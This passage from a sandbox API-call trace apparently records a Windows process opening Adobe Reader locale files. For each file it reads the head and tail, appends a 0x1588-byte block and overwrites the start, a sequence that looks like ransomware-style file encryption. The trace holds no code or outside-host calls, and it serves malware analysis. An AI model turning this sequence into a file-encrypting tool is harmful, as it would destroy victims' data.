lpMultiByteStr="Checkers.SUO", lpUsedDefaultChar=0x0) returned 12 [0076.486] ReadFile (in: hFile=0x1e4, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0076.489] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1ce00 [0076.489] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.491] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1ce00 [0076.492] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.492] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.492] WriteFile (in: hFile=0x1e4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.493] CloseHandle (hObject=0x1e4) returned 1 [0076.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\pddom.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\pddom.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.494] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.494] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2c00 [0076.494] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.494] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.494] ReleaseMutex (hMutex=0x168) returned 1 [0076.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.SUO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.SUO", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.SUO", lpUsedDefaultChar=0x0) returned 9 [0076.495] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.788] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1c00 [0076.788] ReadFile (in: hFile=0x1e4, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.788] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1c00 [0076.788] WriteFile (in: hFile=0x1e4, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.789] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.789] WriteFile (in: hFile=0x1e4, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.789] CloseHandle (hObject=0x1e4) returned 1 [0076.789] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.790] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.790] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x9299 [0076.790] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.790] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.790] ReleaseMutex (hMutex=0x168) returned 1 [0076.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0076.790] ReadFile (in: hFile=0x1e4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0076.792] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x8299 [0076.793] ReadFile (in: hFile=0x1e4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.793] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x8299 [0076.794] WriteFile (in: hFile=0x1e4, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.794] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.794] WriteFile (in: hFile=0x1e4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.794] CloseHandle (hObject=0x1e4) returned 1 [0076.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Annots.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\annots.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.795] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.795] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7f600 [0076.796] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.796] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.796] ReleaseMutex (hMutex=0x168) returned 1 [0076.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.FRA", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.FRA", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.FRA", lpUsedDefaultChar=0x0) returned 10 [0076.796] ReadFile (in: hFile=0x1e4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0076.799] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7e600 [0076.800] ReadFile (in: hFile=0x1e4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.802] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7e600 [0076.802] WriteFile (in: hFile=0x1e4, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.803] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.803] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0076.803] CloseHandle (hObject=0x1e4) returned 1 [0076.804] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\makeaccessible.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\makeaccessible.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.804] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.804] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x14c00 [0076.805] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.805] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.805] ReleaseMutex (hMutex=0x168) returned 1 [0076.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.FRA", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0076.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.FRA", cchWideChar=18, lpMultiByteStr=0x1f88d34, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.FRA", lpUsedDefaultChar=0x0) returned 18 [0076.805] ReadFile (in: hFile=0x1e4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0076.808] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x13c00 [0076.809] ReadFile (in: hFile=0x1e4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.810] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x13c00 [0076.810] WriteFile (in: hFile=0x1e4, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.811] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.811] WriteFile (in: hFile=0x1e4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.811] CloseHandle (hObject=0x1e4) returned 1 [0076.812] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Search.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\search.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.813] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.813] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6200 [0076.813] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.813] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.814] ReleaseMutex (hMutex=0x168) returned 1 [0076.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.FRA", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.FRA", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.FRA", lpUsedDefaultChar=0x0) returned 10 [0076.814] ReadFile (in: hFile=0x1e4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.825] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5200 [0076.826] ReadFile (in: hFile=0x1e4, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.826] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5200 [0076.826] WriteFile (in: hFile=0x1e4, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.827] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.827] WriteFile (in: hFile=0x1e4, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.827] CloseHandle (hObject=0x1e4) returned 1 [0076.828] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Acroform.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\acroform.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.829] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.829] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x66600 [0076.830] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.830] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.830] ReleaseMutex (hMutex=0x168) returned 1 [0076.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.HRV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.HRV", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.HRV", lpUsedDefaultChar=0x0) returned 12 [0076.830] ReadFile (in: hFile=0x1e4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0076.833] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x65600 [0076.834] ReadFile (in: hFile=0x1e4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0076.837] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x65600 [0076.837] WriteFile (in: hFile=0x1e4, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.838] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0076.838] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0076.838] CloseHandle (hObject=0x1e4) returned 1 [0076.839] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\EScript.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\escript.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0076.840] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.840] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa200 [0076.840] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0076.840] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.840] ReleaseMutex (hMutex=0x168) returned 1 [0076.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.HRV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.HRV", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.HRV", lpUsedDefaultChar=0x0) returned 11 [0076.840] ReadFile (in: hFile=0x1e4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0077.246] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9200 [0077.246] ReadFile (in: hFile=0x1e4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0077.246] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9200 [0077.247] WriteFile (in: hFile=0x1e4, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.247] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0077.247] WriteFile (in: hFile=0x1e4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.247] CloseHandle (hObject=0x1e4) returned 1 [0077.248] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Reflow.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\reflow.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0078.005] 